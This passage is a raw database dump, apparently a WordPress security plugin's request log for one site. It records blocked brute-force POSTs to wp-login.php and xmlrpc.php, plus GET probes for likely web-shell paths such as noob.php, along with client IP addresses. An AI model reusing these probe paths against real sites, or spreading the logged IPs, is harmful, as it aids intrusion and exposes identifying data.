Firefox\\/62.0\"}','RqQm43NAEVkhLCG5fUTKrPJY',0,1629855559.5640,172,'','POST',403,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','kJVC25cTns6vZmXjqPetGOKM',0,1629855572.6994,92,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','B3spxYRzoSbFPTmNcX4MKqw0',0,1629855572.9568,119,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','UMByuVDewpEQTOGadbh8vmoX',0,1629855633.6774,141,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','q7olIDM03nOSkFVcpL56P2Gu',0,1629855633.9940,94,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','LJpDWkdv0jnhct92YIebTyKF',0,1629855695.8448,93,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','fFC9szVB1Mw4tNR0G2A3jpYl',0,1629855696.0936,93,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','WkMGE5bIACRUrgP0TuZy7DzO',0,1629855757.1574,248,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','EwsNUlnruBL7IMOWGFTtcXKq',0,1629855757.9943,195,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','uQMUNObSkniCYvctHEAsfF8W',0,1629855818.0578,140,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','GVut8TcCXlaRhzUofKwpnBJ3',0,1629855818.3742,109,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','xdk7JXFuryoUpqMi8zGSH5Y0',0,1629855879.0258,96,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','PpdNxuwFSG0lBiXe8OksT3IA',0,1629855879.3137,84,'','POST',404,0,700,0,1,'',0),('103.124.93.236',1736203756,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','NyA9V3tcIOl4khQYbPJ5dCqe',0,1629855916.2515,135,'','POST',403,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','oILR6jP8235CHyimqXU4QArk',0,1629855942.6911,115,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','HWh0KP1dbemjoYw8GzVZNpCE',0,1629855943.0559,91,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','s96o3vOfgGJMVw0YZzheq48E',0,1629856003.8089,137,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Mz6Y5nsXviARktlN3W7SQgj1',0,1629856004.1234,105,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','gwPQjphCUluifIWHLrxJ1ZAT',0,1629856064.0213,144,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','EhpdCuX8oQxZ9OLeWKgBTY24',0,1629856064.3528,95,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','TX8S45cRpMkd1r3Pnf6u9xmK',0,1629856126.8412,103,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','53Beiy9lrx2Y71DoFNzWubck',0,1629856127.1127,99,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','wBX85tIjEpYiUGPJ64vO79qZ',0,1629856188.4787,133,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','U4rPcon7wX8AkyN2zEdaDQfq',0,1629856188.7903,97,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','5JCzWSFt8ueXVoys3vbr7p9Q',0,1629856250.0806,134,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','QclYvg5rw48sIVu9eLB2OohE',0,1629856250.4094,98,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Sd4xikpIJhf15DEugFlayRej',0,1629856310.1093,148,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','zrIOD7kaN5uYXexHCc9ZjAgB',0,1629856310.4823,107,'','POST',404,0,700,0,1,'',0),('31.210.79.220',533876700,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','QrMdoJXbIUL0lpSzsDuHemjh',0,1629856336.6563,134,'','POST',403,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','1NZpabYurScWdFf5gQH9XLvn',0,1629856372.0800,156,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','K3RXuhkNMnTtzWycOlqAi6rQ',0,1629856372.4188,132,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','i9MP4vJtGmVK6ehBY2CaDnEl',0,1629856434.3702,143,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','rg29Jy1SxZm6CsBVlND7nWdo',0,1629856434.6914,91,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','OrjQbViSaZy18snUvJXg4BF2',0,1629856495.5369,116,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','iwFgtLu58QrT4lN6E0YyCzsP',0,1629856495.8614,93,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','nXLsS7RMmWQUc0oZJY64eKCt',0,1629856556.5483,112,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','kZU8sCOQupPai1XE50mfSewK',0,1629856556.8736,90,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','v9kSXiAzPH04bQBMFa8ocsCI',0,1629856618.1776,109,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','2RpkKnzIyxshVFGc6fjBZMPd',0,1629856618.4609,100,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','glGIUYVamjPhFvz14Li5cdTE',0,1629856679.0762,109,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','NUGial7KRFI1rbOfyoPt5jXh',0,1629856679.3614,92,'','POST',404,0,700,0,1,'',0),('107.161.177.10',1805758730,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','2KUlfCWyo0Ewx79reu4gB3tR',0,1629856724.9872,148,'','POST',403,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','13VcoPrYk98gHZ0bR2QjpenW',0,1629856740.7290,108,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','kvRheb4SLnD3WtfB1NxiAPJE',0,1629856741.0231,126,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','eLmINYSWbTrpjq5OGfQMk8FV',0,1629856801.5192,101,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','39HtbGnXkh71DMRTCrVupJ4N',0,1629856801.7985,95,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','mXPgtGlx5RMBD7d4sTWFv0K1',0,1629856862.2372,114,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','YgZoX8iARQDJ5VvaMI4lkFT0',0,1629856862.5340,91,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','TrcdH4xNEpwk0WblOQPsAeqo',0,1629856923.6352,112,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Y8fhtZ4oDngVlxrK7wBENci0',0,1629856923.9195,94,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','zgQFEL5b9PXhwBIa021uHUWl',0,1629856984.3619,122,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','HWrdfa72CgNvwX5mAYpuIGPl',0,1629856984.6623,85,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','hV7CItJLwo5AO1mvTnEf8xck',0,1629857045.0668,132,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','G6zRANKIHxXwoChvpbkYEDn8',0,1629857045.3899,83,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','60rB7zaecZuEtT3JvxfAyM4N',0,1629857106.0042,89,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','iIjcx8BlH3OFPqY260ELGfXW',0,1629857106.3028,96,'','POST',404,0,700,0,1,'',0),('208.109.8.126',3496806526,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','KloOZXNeLwjvR3JDCUVifAmE',0,1629857125.9637,141,'','POST',403,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','2xXENVTrIAmkQyFlwqJ3Oavg',0,1629857167.2173,144,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','OysbCmhNYv0wXAMHEIc1t3So',0,1629857167.5412,105,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','3LnUrIozWZRYbTcESy0V5C2X',0,1629857228.1033,107,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','0Xp8ulfSQPHb951vY63CWnJa',0,1629857228.3852,101,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','vROmabLl5nc9DxBGTZks4HNX',0,1629857289.5368,695,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','iWNcpL1bwP8duDETGzUjHCKQ',0,1629857290.4361,90,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','IDt6Q7LaYyXT2OwPxJ9gSunp',0,1629857350.0240,166,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','03Wb1DrdwRPG98K56nflLUVO',0,1629857350.3688,88,'','POST',404,0,700,0,1,'',0),('107.150.63.170',1805008810,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/34.0.1847.116 Chrome\\/34.0.1847.116 Safari\\/537.36\"}','yQATBP7Wj6fgaeqlo9n0Grim',0,1629857402.2686,147,'','POST',403,0,600,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Fwi19cmtWMaTkLYZd2IN4Spe',0,1629857411.3112,428,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','lcR9ZVdwxC6F0zQaLy73mqnK',0,1629857411.9481,94,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','c6IEYGvSkHZVr180AoKgjwfs',0,1629857472.4059,294,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','T6brnFzIXw1A4V5B0af9pycU',0,1629857472.9057,98,'','POST',404,0,700,0,1,'',0),('147.139.136.124',2475395196,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','nMKYL7lAZeHdRXfczvyJxwuP',0,1629857519.1776,146,'','POST',403,0,515,0,1,'',0),('142.54.177.3',2385948931,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','db3s9DRCSNYa2yXHjg4mqT6w',0,1629857524.3047,129,'','POST',403,0,600,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','GuvFlKzj09owmnhqcVJMr6bN',0,1629857533.4933,131,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','nNvIPqwZsXh9Hb0pTWVtYBg7',0,1629857533.8699,111,'','POST',404,0,700,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','0fBrzxvW3HXa4utIpJqYPLAO',0,1629857593.9827,166,'','POST',404,0,515,0,1,'',0),('181.143.205.4',3046100228,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','3TkuCeQBNq2AmtS9OEr1Rjsd',0,1629857594.3714,112,'','POST',404,0,700,0,1,'',0),('107.150.63.170',1805008810,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','6xnUXEG7TkH2cYJ8AdOVlmhy',0,1629857808.7536,157,'','POST',403,0,600,0,1,'',0),('103.142.25.112',1737365872,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','crCB3y1ZqYmnlSA2oOf6JuMQ',0,1629857914.9004,247,'','POST',403,0,515,0,1,'',0),('186.64.119.225',3124787169,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','E34MB0KIOmokZfq1LDveQN67',0,1629858282.7226,59012,'','POST',403,0,515,0,1,'',0),('192.163.198.248',3231958776,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','ACHxBuRGhQbp9oOYWjScwK5D',0,1629858707.0108,1974,'','POST',403,0,515,0,1,'',0),('103.147.10.253',1737689853,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','zHSG0VdwMnABtFc6NOf1rQPX',0,1629859087.4033,167,'','POST',403,0,515,0,1,'',0),('186.64.116.65',3124786241,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','qyx9ARHw3ecoJkFlrW4NDnEt',0,1629859463.6223,156,'','POST',403,0,515,0,1,'',0),('107.161.177.10',1805758730,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','6rLTQjo1gBX2xyKCSFcZsEwh',0,1629859886.5399,526,'','POST',403,0,515,0,1,'',0),('115.65.255.188',1933705148,'','https://www.westonspirit.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.92 Safari\\/537.36\"}','EtvCVPOGwI4JHshZ91kfX75U',0,1629859961.4956,132,'','GET',403,0,700,0,1,'',0),('220.84.215.92',3696547676,'','https://www.westonspirit.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.92 Safari\\/537.36\"}','YOqhAKnx9lfDENuPV76sHGzW',0,1629859965.5333,121,'','GET',403,0,700,0,1,'',0),('112.214.17.112',1893077360,'','https://www.westonspirit.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.92 Safari\\/537.36\"}','8hxrEZYSNda5HiKIkPzgyqsW',0,1629859969.5685,577,'','GET',403,0,700,0,1,'',0),('1.220.1.78',31195470,'','https://www.westonspirit.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.92 Safari\\/537.36\"}','SCbiK3OnjWmqYsPzuMJ2Gf6w',0,1629859975.2017,100,'','GET',403,0,700,0,1,'',0),('175.118.235.4',2943806212,'','https://www.westonspirit.org.uk/wp-includes/js/dist/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.92 Safari\\/537.36\"}','H5k3PlTIWDKxnO1024adcbuw',0,1629859994.8843,159,'','GET',403,0,700,0,1,'',0),('221.124.2.19',3715891731,'','https://www.westonspirit.org.uk/wp-includes/js/jcrop/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.92 Safari\\/537.36\"}','drRm8ynvAgaBcTotOQZE0NMf',0,1629860011.1094,260,'','GET',403,0,700,0,1,'',0),('118.220.132.20',1994163220,'','https://www.westonspirit.org.uk/wp-includes/js/crop/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.92 Safari\\/537.36\"}','LJ7nQUjpyRCVct6O13aPuo5q',0,1629860030.6520,282,'','GET',403,0,700,0,1,'',0),('103.86.176.93',1733734493,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','yIv8RxJjkp1hSrmbPDeBwst3',0,1629860274.2953,173,'','POST',403,0,515,0,1,'',0),('107.150.45.58',1805004090,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','wagNGcIC6MyuAqkm5ZYhipR4',0,1629861032.7328,8031,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','iKAaSzF8DdCobI7kZXjmxyrq',0,1629862202.3166,1622,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','PaLTsHwrZE9ItzbqWeUMY0xK',0,1629864904.4757,155,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Mwv4rmecN3dIxj2Su1qQChDF',0,1629864965.2107,242,'','POST',403,0,600,0,1,'',0),('59.96.136.177',996182193,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','ZriUYGy1F4PC9eTNoQX8HuzO',0,1629865086.7728,170,'','POST',403,0,600,0,1,'',0),('144.34.166.150',2418189974,'','https://westonspirit.org.uk/wordpress/wp-content/plugins/xnxx/noob.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/westonspirit.org.uk\\/wordpress\\/wp-content\\/plugins\\/xnxx\\/noob.php\"}','2F5CsyUSnwJmPWzMNLcqOprK',0,1629866900.0820,323,'','GET',403,0,700,0,1,'',0),('144.34.166.150',2418189974,'','https://westonspirit.org.uk/wordpress/wp-content/plugins/xnxx/noob.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/westonspirit.org.uk\\/wordpress\\/wp-content\\/plugins\\/xnxx\\/noob.php\"}','63yEcsrmgRBJVQqzSHI80Zx4',0,1629866904.3996,321,'','GET',403,0,700,0,1,'',0),('69.30.244.20',1159656468,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 